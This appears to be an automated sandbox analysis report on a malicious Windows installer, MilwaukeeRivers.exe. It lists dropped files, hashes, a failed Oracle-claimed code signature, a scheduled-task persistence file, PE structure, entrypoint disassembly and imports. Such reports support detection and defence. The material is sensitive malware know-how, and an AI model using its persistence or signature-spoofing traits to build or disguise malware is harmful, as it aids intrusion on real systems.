                              Preview:).P[).P[+.P[*.P[+.P[..P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.Q[....n......2I.?(E.$.}.>?E.#.y.1)^..>D...X.7)K.#.y.1)^. [*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[i..5C.9:F.*>o.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[i..)O.$>c.#/K.3>*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[....n..~v.98X.#4L.~.o...X.=>]."0*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[\.~k..`l..P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[

                              C:\Users\user\AppData\Local\Temp\rrwkeeb

                              Download File
                              Process:C:\Windows\SysWOW64\more.com
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):544256
                              Entropy (8bit):6.517105923688266
                              Encrypted:false
                              SSDEEP:
                              MD5:3457FFDDBB4374C9013A430213FEE006
                              SHA1:78BAFB496BF44B291BF458714B75275F69316179
                              SHA-256:5444B66A973C31A73E4B86C3F8847C37ACE297496696A5201A84DD24130DB0C6
                              SHA-512:B7B81632C5FE659E56F5A98D7679441BB49F76C0676656F045F95DE02DCE0275AAF60D128219D36BD7D725A4AC1138D128D3BCFB945A44F2747724B84E3F1A02
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D...*...*...*..)...*../.r.*......*..)...*../..*.......*......*..+...*...+.?.*...#...*.......*...(...*.Rich..*.........PE..L......O..........................................@.......................................@..................................5...................................E..\...8...............................@...............@............................text............................... ..`.rdata...I.......J..................@..@.data....m...P...,...>..............@....rsrc................j..............@..@.reloc...E.......F...l..............@..Biowjk........ ......................@...................................................................................................................................................................................................................................................................

                              C:\Windows\Tasks\MB Led SDK.job

                              Download File
                              Process:C:\Windows\SysWOW64\more.com
                              File Type:data
                              Category:dropped
                              Size (bytes):274
                              Entropy (8bit):3.52416308593339
                              Encrypted:false
                              SSDEEP:
                              MD5:1479E46CBD0DED4D9F276EC7A5B7E36E
                              SHA1:D5EF9480C0A587F7D09972812562499833D15699
                              SHA-256:1AEBA6018DD454465C4E15A442541AC650DAEA2FAC14FCDF9E83EA046E968145
                              SHA-512:6609F3529F658EEF102E660F2C11351BD6E4EF5D70B4025FDB54C61C152DB5143493F080E1CC74244F262EBA7EB87F27DB59FBEFCF1BE0D7B4277DFD69737285
                              Malicious:false
                              Reputation:unknown
                              Preview:.....|....ZH....r..F.......<... ................ ....................5.C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.C.p.b._.D.o.c.k.e.r.\.m.o.a.g.e.n.t...e.x.e.........C.A.L.I.-.P.C.\.c.a.l.i...................0.........q.......+.............................

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.980668146883335
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:MilwaukeeRivers.exe
                              File size:971'658 bytes
                              MD5:e922a4d7d2c3c937231aa937b9a2ad25
                              SHA1:b78ade0fbd78bff01d5c86079c9224d7b87f0770
                              SHA256:bdc7b917477bb49af7a5b06e5d9ed20e08fed25944f297a6b36a50d03d8a5777
                              SHA512:501a15eb4c5c64f2df9f454c11951907f33a834885113e14491a6823d8e3373c09523a3eedb52952aada8071dbeec88338dbdeb02a2c4d7a8e0af48eb1dbe5f6
                              SSDEEP:24576:7gk8NlvGOgHdQFQ/Dfw/EQky/vgNs9OHYkc:WvGOgHeFODfwcC3WsSS
                              TLSH:672523901AFD547AD0F94235347198883E79FA1362FBD21BB7087E857E312B64A31B87
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

                              File Icon

                              Icon Hash:fef0e6e6f8b6d680

                              Static PE Info

                              General

                              Entrypoint:0x403883
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:be41bf7b8cc010b614bd36bbca606973

                              Authenticode Signature

                              Signature Valid:false
                              Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                              Signature Validation Error:The digital signature of the object did not verify
                              Error Number:-2146869232
                              Not Before, Not After
                              • 07/01/2020 01:00:00 11/01/2022 13:00:00
                              Subject Chain
                              • E=pkiadm_us@oracle.com, CN="Oracle America, Inc.", OU=Software Engineering, O="Oracle America, Inc.", L=Redwood City, S=California, C=US
                              Version:3
                              Thumbprint MD5:3FBCE3B31E0004E8BDF9247518E7FF30
                              Thumbprint SHA-1:5C6F6AC9F7DE49E1D88B5F10D74B7C3BB4AD2F7B
                              Thumbprint SHA-256:17BCE26A73BD38D3ABF4E79C66E771C71462C77CCEED92FEEA93760287CE9C15
                              Serial:09105884EB959D3BC8B994F918A7B6EE

                              Entrypoint Preview

                              Instruction
                              sub esp, 000002D4h
                              push ebx
                              push ebp
                              push esi
                              push edi
                              push 00000020h
                              xor ebp, ebp
                              pop esi
                              mov dword ptr [esp+18h], ebp
                              mov dword ptr [esp+10h], 00409268h
                              mov dword ptr [esp+14h], ebp
                              call dword ptr [00408030h]
                              push 00008001h
                              call dword ptr [004080B4h]
                              push ebp
                              call dword ptr [004082C0h]
                              push 00000008h
                              mov dword ptr [00472EB8h], eax
                              call 00007F43590E4E5Bh
                              push ebp
                              push 000002B4h
                              mov dword ptr [00472DD0h], eax
                              lea eax, dword ptr [esp+38h]
                              push eax
                              push ebp
                              push 00409264h
                              call dword ptr [00408184h]
                              push 0040924Ch
                              push 0046ADC0h
                              call 00007F43590E4B3Dh
                              call dword ptr [004080B0h]
                              push eax
                              mov edi, 004C30A0h
                              push edi
                              call 00007F43590E4B2Bh
                              push ebp
                              call dword ptr [00408134h]
                              cmp word ptr [004C30A0h], 0022h
                              mov dword ptr [00472DD8h], eax
                              mov eax, edi
                              jne 00007F43590E242Ah
                              push 00000022h
                              pop esi
                              mov eax, 004C30A2h
                              push esi
                              push eax
                              call 00007F43590E4801h
                              push eax
                              call dword ptr [00408260h]
                              mov esi, eax
                              mov dword ptr [esp+1Ch], esi
                              jmp 00007F43590E24B3h
                              push 00000020h
                              pop ebx
                              cmp ax, bx
                              jne 00007F43590E242Ah
                              add esi, 02h
                              cmp word ptr [esi], bx

                              Rich Headers

                              Programming Language:
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [ C ] VS2010 SP1 build 40219
                              • [RES] VS2010 SP1 build 40219
                              • [LNK] VS2010 SP1 build 40219

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000xdb6.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0xeb84a0x1b40.ndata
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0xf40000xdb60xe0089ee89fe7851f158d99c5bfbf671994bFalse0.5638950892857143data5.283772998839277IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xf50000xf320x100028eb16c084f743398eac7a551641079bFalse0.570556640625data5.240238381990466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0xf41d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7952127659574468
                              RT_DIALOG0xf46400x100dataEnglishUnited States0.5234375
                              RT_DIALOG0xf47400x11cdataEnglishUnited States0.6056338028169014
                              RT_DIALOG0xf485c0x60dataEnglishUnited States0.7291666666666666
                              RT_GROUP_ICON0xf48bc0x14dataEnglishUnited States1.1
                              RT_VERSION0xf48d00x210dataEnglishUnited States0.509469696969697
                              RT_MANIFEST0xf4ae00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                              Imports

                              DLLImport
                              KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                              USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                              SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                              ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States